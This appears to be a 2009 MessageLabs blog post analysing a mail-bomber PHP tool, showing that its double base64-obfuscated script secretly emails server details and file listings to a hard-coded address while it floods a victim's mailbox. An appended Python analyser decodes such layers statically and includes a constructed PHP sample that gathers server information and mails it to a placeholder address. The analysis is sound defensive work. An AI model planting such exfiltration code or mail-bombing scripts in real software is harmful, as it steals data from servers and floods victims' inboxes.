Mail Bomber – it does more than you thought

Daren Lewis
October 15th, 2009
Tags: Hosted Mail Security, Security, MessageLabs Intelligence

After spending some time analysing the mail bomber tool downloaded from spamfordz [dot] com, here is some of the interesting information we noticed.

[Image: 20091005_01.gif]

Fig. 1 Files contained in the tool package

To get this working, one needs to upload the files (shown in Fig. 1 above) to a web server and open the index.html file, which displays the mail bomber form shown below.

[Image: 20091005_02.gif]

Fig. 2 Mail Bomber form

As the form shows, one just needs to follow a few easy steps, such as entering the victim's email address and the From name, then hit the 'Do It!' button, and the job is done.

Is it that simple? Before answering the question, let's take a look at what actually happens behind the 'Do It!' button. Hitting 'Do It!' opens the file bmb.php, which is contained in the mail bomber package, as shown in Fig. 1. What does that file contain? Opening it in Notepad, we see some base-64 encoded strings, as shown in Fig. 3.

[Image: 20091005_03.gif]

Fig. 3 Base-64 encoded characters

When the file is executed, it first decodes the base-64 encoded string in the highlighted box-2 in Fig. 3. The decoded script is shown in Fig. 4 below.

[Image: 20091005_04.gif]

Fig. 4 The base-64 encoded string decoded

It is interesting to note that the decoded script in Fig. 4 contains a call to base64_decode() and some other string manipulation operations, which in turn decode the base-64 encoded string in the highlighted box-2 in Fig. 3 above. Only after this second decoding does it become clear what the script does, as shown in Fig. 5 below.

First, it collects the server information, iterates through the file names in the directory where the mail bomber's index.html file sits, and sends that information to the hard-coded email address servicemhz[at]gmail.com, as shown in the highlighted box-1 in the figure.

[Image: 20091005_05.gif]

Fig. 5 The fully decoded script

Second, it sends mail to the specified victim's email address, as shown in the highlighted box-2 above. In this example, it sends 5000 mails to bomb the victim's mailbox.

Now we know what it does. When a spammer downloads the free mail bomber tool and uses it to bomb a victim's mailbox, he might not realize that he also becomes a victim: information about his server, and about the files sitting on it, is sent to the hard-coded email address, which probably belongs to the mail bomber tool's provider. Because all the scripts are base-64 encoded, it is hard to understand what the tool does without decoding them.
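As an added illustration, not code from this post or from the tool's author, the Python analyser below does statically what the post describes doing by hand: it peels nested base64_decode() layers out of a PHP file without ever executing it, then flags the indicators the post calls out in the decoded script (a mail() call, $_SERVER/php_uname() server fingerprinting, directory listing, and a hard-coded email address). The sample PHP is constructed inline with a placeholder address and is not the real bmb.php. The strrev() and gzinflate() handling goes a little beyond the post, covering two wrappers PHP obfuscators commonly put around base64_decode().

```python
import base64
import re
import zlib
from typing import Optional

# A base64 literal handed to base64_decode(), optionally wrapped in strrev() or
# gzinflate(), two wrappers commonly seen in obfuscated PHP (assumption: the
# literal is a plain quoted string, not built up by concatenation).
LAYER_RE = re.compile(
    r"(?:(?P<wrap>gzinflate|strrev)\s*\(\s*)?"
    r"base64_decode\s*\(\s*['\"](?P<b64>[A-Za-z0-9+/=\s]+)['\"]\s*\)"
)

# Indicators matching the behaviour the post describes once the script is decoded.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "mail_send": re.compile(r"\bmail\s*\("),
    "server_info": re.compile(r"\$_SERVER\b|\bphp_uname\s*\(|\bphpinfo\s*\("),
    "dir_listing": re.compile(r"\b(?:scandir|opendir|readdir|glob)\s*\("),
    "hardcoded_email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
}


def _decode_layer(match: re.Match) -> Optional[str]:
    """Turn one matched base64_decode(...) call into the text it would yield."""
    try:
        data = base64.b64decode(re.sub(r"\s+", "", match.group("b64")), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    wrap = match.group("wrap")
    if wrap == "gzinflate":
        try:
            data = zlib.decompress(data, -15)  # raw DEFLATE, as PHP's gzinflate expects
        except zlib.error:
            return None
    text = data.decode("utf-8", errors="replace")
    return text[::-1] if wrap == "strrev" else text


def peel_layers(php_source: str, max_depth: int = 10) -> list:
    """Statically unwrap nested base64_decode() calls; never executes any PHP.
    Layer 0 is the original source; deeper layers are successive decodes."""
    layers = [php_source]
    frontier = [php_source]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for m in LAYER_RE.finditer(text):
                decoded = _decode_layer(m)
                if decoded is not None:
                    layers.append(decoded)
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def analyse(php_source: str) -> dict:
    """Report which indicators appear at which decoding depth, plus every
    email address found anywhere in the decoded layers."""
    layers = peel_layers(php_source)
    findings = {}
    for depth, text in enumerate(layers):
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if hits:
            findings[depth] = hits
    emails = sorted({e for text in layers for e in INDICATORS["hardcoded_email"].findall(text)})
    return {"layers": len(layers), "findings": findings, "emails": emails}


# --- Constructed sample (NOT the real bmb.php): an innermost script that
# fingerprints the server, lists its directory and mails that to a placeholder
# address, wrapped in two base64 layers the way the post describes.
def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


INNER_PHP = (
    "$info = php_uname() . ' ' . $_SERVER['SERVER_NAME'];\n"
    "$files = implode(',', scandir(dirname(__FILE__)));\n"
    "mail('operator@example.invalid', 'server info', $info . \"\\n\" . $files);\n"
)
MIDDLE_PHP = f"eval(strrev(base64_decode('{_b64(INNER_PHP[::-1])}')));"
SAMPLE_PHP = f"<?php eval(base64_decode('{_b64(MIDDLE_PHP)}')); ?>"

if __name__ == "__main__":
    report = analyse(SAMPLE_PHP)
    for depth, hits in report["findings"].items():
        print(f"depth {depth}: {', '.join(hits)}")
    print("addresses:", ", ".join(report["emails"]))
```

Run on the constructed sample, the analyser reports only eval() at depths 0 and 1 and the mail/server-info/directory-listing/email indicators at depth 2, which is exactly the shape the post describes: nothing suspicious is visible until both base-64 layers are peeled. Because the decoding is static, it is safe to run against a suspicious upload on a web server; it never evaluates the PHP.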
About MessageLabs Intelligence Blog

The MessageLabs Intelligence blog serves as a conduit for communicating MessageLabs Intelligence data, trends and statistics. MessageLabs Team Skeptic™ comprises many world-renowned malware and spam experts, who have a global view of threats across multiple communication protocols drawn from the billions of web pages, email and IM messages they monitor each day on behalf of 21,000 clients in more than 102 countries.